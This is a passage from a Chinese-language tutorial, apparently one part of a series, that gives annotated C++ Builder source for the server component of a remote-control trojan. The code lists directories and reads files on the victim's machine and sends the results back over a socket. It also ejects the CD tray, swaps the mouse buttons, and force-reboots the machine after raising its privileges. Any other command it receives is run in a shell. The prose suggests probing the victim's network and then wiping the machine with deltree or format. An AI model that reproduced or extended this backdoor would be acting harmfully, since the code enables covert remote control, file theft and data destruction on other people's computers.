让Windows与众不同 
{
else if(temp.substring(0,3)=="dir")
{
//如果前3个字符是“dir”
int read_num;
char * cr_lf="\n";
int attrib;
char *filename;
dir *dir;
struct dirent *ent;
int number=temp.length();
//得到字符串的长度
ansistring dir_name=temp.substring(5,number-3);
//从字符串第六个字符开始,将后面的字符存入dir_name变量,这是目录名
if(dir_name=="")
{
//如果目录名为空
socket->sendtext("fail by open dir's name");
//返回“fail by open dir's name”信息
goto end;
//跳到end
}
char * dirname;
dirname=dir_name.c_str();
if ((dir = opendir(dirname)) == null)
{
//如果打开目录出错
socket->sendtext("fail by your dir's name!");
//返回“fail by your dir's name”信息
goto end;
//跳到end
}
times_of_try=0;
while(fp==null)
{
//如果指针是null
fp=fopen(tempfile,"w+");
//就创建system\win369.bat准备读和写;如果此文件已存在,则会被覆盖
times_of_try=times_of_try+1;
//计数器加1
if(times_of_try>100)
{
//如果已经试了100次了,仍未成功(真有耐心!)
socket->sendtext("fail by open file");
//就发回“fail by open file”的错误信息
goto end;
//并跳到end处
}
}
while ((ent = readdir(dir)) != null)
{
//如果访问目标目录成功
if(*(ansistring(dirname)).ansilastchar()!='\\')
//如果 后一个字符不是“\”,证明不是根目录
filename=(ansistring(dirname)+"\\"+ent->d_name).c_str();
//加上“\”字符后将指针指向目录流
else
filename=(ansistring(dirname)+ent->d_name).c_str();
//如果是根目录,则不用加“\”
attrib=_rtl_chmod(filename, 0);
//得到目标文件的访问属性
if (attrib & fa_rdonly)
//“&”字符是比较前后两个变量,如果相同返回1,否则返回0
fwrite(" r",sizeof(char),3,fp);
//将目标文件属性设为只读
else
fwrite(" ",sizeof(char),3,fp);
//失败则写入空格
if (attrib & fa_hidden)
fwrite("h",sizeof(char),1,fp);
//将目标文件属性设为隐藏
else
fwrite(" ",sizeof(char),1,fp);
//失败则写入空格
if (attrib & fa_system)
fwrite("s",sizeof(char),1,fp);
//将目标文件属性设为系统
else
fwrite(" ",sizeof(char),1,fp);
//失败则写入空格
if (attrib & fa_arch)
fwrite("a",sizeof(char),1,fp);
//将目标文件属性设为普通
else
fwrite(" ",sizeof(char),1,fp);
//失败则写入空格
if (attrib & fa_direc)
fwrite("
",sizeof(char),9,fp);
//将目标文件属性设为目录
else
fwrite(" ",sizeof(char),9,fp);
//失败则写入空格
fwrite(ent->d_name,sizeof(char),strlen(ent->d_name),fp);
//将目录名写入目标文件
fwrite(cr_lf,1,1,fp);
//写入换行
}
fclose(fp);
//关闭文件
closedir(dir);
//关闭目录
file *fp1=null;
times_of_try=0;
while(fp1==null)
{
fp1=fopen(tempfile,"r");
//打开win369.bat准备读
times_of_try=times_of_try+1;
//计数器加1
if(times_of_try>100)
{
//如果已经试了100次了,仍未成功
socket->sendtext("fail by open file");
//就发回“fail by open file”的错误信息
goto end;
//并跳到end处
}
}
ansistring return_text="";
char temp_content[300];
for(int i=0;i<300;i++) temp_content='\0';
//定义的一个空数组
read_num=fread(temp_content,1,300,fp1);
//从目标文件中读入前300个字符
while(read_num==300)
{
return_text=return_text+temp_content;
//return_text变量加上刚才的300个字符
for(int i=0;i<300;i++) temp_content='\0';
read_num=fread(temp_content,1,300,fp1);
//重复
};
return_text=return_text+temp_content;
//return_text变量加上刚才的300个字符
fclose(fp1);
//关闭目标文件
socket->sendtext(return_text);
//返回return_text变量的内容
}
}
够长吧?!察看目录树这么费劲啊?!你后面可以用bcb中的各种列表框对client.exe好好美化美化。接下来就是查看指定文件的内容了,client将使用“type”命令,(手指累不累啊?):
{
else if(temp.substring(0,4)=="type")
{
//如果前4个字符是“type”
int read_num;
int number=temp.length();
ansistring file_name=temp.substring(6,number-4);
//将目标文件流存入file_name变量中
times_of_try=0;
while(fp==null)
{
fp=fopen(file_name.c_str(),"r");
//打开目标文件准备读
times_of_try=times_of_try+1;
//计数器加1
if(times_of_try>100)
{
//如果已试了100次了
socket->sendtext("fail by open file");
//返回“fail by open file”的错误信息
goto end;
//跳到end
}
}
ansistring return_text="";
char temp_content[300];
for(int i=0;i<300;i++) temp_content='\0';
//定义一个空数组
read_num=fread(temp_content,1,300,fp);
//从目标文件中读入前300个字符
while(read_num==300)
{
return_text=return_text+temp_content;
//return_text的内容加上刚才的字符
for(int i=0;i<300;i++) temp_content='\0';
read_num=fread(temp_content,1,300,fp);
//重复
};
return_text=return_text+temp_content;
//return_text的内容加上刚才的字符
fclose(fp);
//关闭目标文件
socket->sendtext(return_text);
//返回return_text的内容,即你查看文件的内容
}
}
咳咳!累死了!还是来点轻松的吧——操纵目标机的光驱(注意:mcisendstring()函数的声明在mmsystem.h头文件中):
{
else if(temp=="open")
{
//如果收到的temp的内容是“open”
mcisendstring("set cdaudio door open", null, 0, null);
//就弹出光驱的托盘
}
else if(temp=="close")
{
//如果收到的temp的内容是“close”
mcisendstring("set cdaudio door closed wait", null, 0, null);
//就收入光驱的托盘。当然你也可以搞个死循环,让他的光驱好好活动活动!^_^
}
}
接着就是交换目标机的鼠标左右键,代码如下:
{
else if(temp=="swap")
{
swapmousebutton(1);
//交换鼠标左右键,简单吧?
}
}
然后就是使目标机重新启动。但这里要区分winnt和win9x——nt非常注重系统每个进程的权利,一个普通的进程是不应具备有调用系统的权利的,因此我们要赋予本程序足够的权限:
{
else if(temp=="reboot")
{
//如果收到的temp的内容是“temp”
dword dwversion = getversion();
//得到操作系统的版本号
if (dwversion < 0x80000000)
{
//操作系统是winnt,不是win9x
handle htoken;
token_privileges tkp;
//定义变量
openprocesstoken(getcurrentprocess(),token_adjust_privileges | token_query, &htoken);
//openprocesstoken()这个函数的作用是打开一个进程的访问令牌
//getcurrentprocess()函数的作用是得到本进程的句柄
lookupprivilegevalue(null, se_shutdown_name,&tkp.privileges[0].luid);
//lookupprivilegevalue()的作用是修改进程的权限
tkp.privilegecount = 1;
//赋给本进程特权
tkp.privileges[0].attributes = se_privilege_enabled;
adjusttokenprivileges(htoken, false, &tkp, 0,(ptoken_privileges)null, 0);
//adjusttokenprivileges()的作用是通知windows nt修改本进程的权利
exitwindowsex(ewx_reboot | ewx_force, 0);
//强行退出winnt并重启
}
else exitwindowsex(ewx_force+ewx_reboot,0);
//强行退出win9x并重启
}
}
如果以上都不是,就让它在dos窗口中执行传来的命令:
{
else
{
//如果都不是
char * cr_tf="\n";
times_of_try=0;
while(fp==null)
{
fp=fopen(tempfile,"w+");
//创建win369.bat,如果已存在就覆盖
times_of_try=times_of_try+1;
//计数器加1
if(times_of_try>100)
{
socket->sendtext("fail by open file");
//返回“fail by open file”的信息
goto end;
//跳到end
}
}
fwrite(temp.c_str(),sizeof(char),strlen(temp.c_str()),fp);
//写入欲执行的命令
fwrite(cr_tf,sizeof(char),strlen(cr_tf),fp);
//写入换行符
fclose(fp);
//关闭win369.bat
system(tempfile);
//执行win369.bat
socket->sendtext("success");
//返回“success”信息
}
}
你可以直接执行什么ping和tracert之类的命令来进一步刺探目标机的网络状况(判断是否是一个企业的局域网),然后可以进一步攻击,比如deltree和format命令。
到此,服务器程序的功能已全部完成,但还差容错部分未完成,这样才能避免程序因意外而崩溃。朋友,别走开!(未完待续)
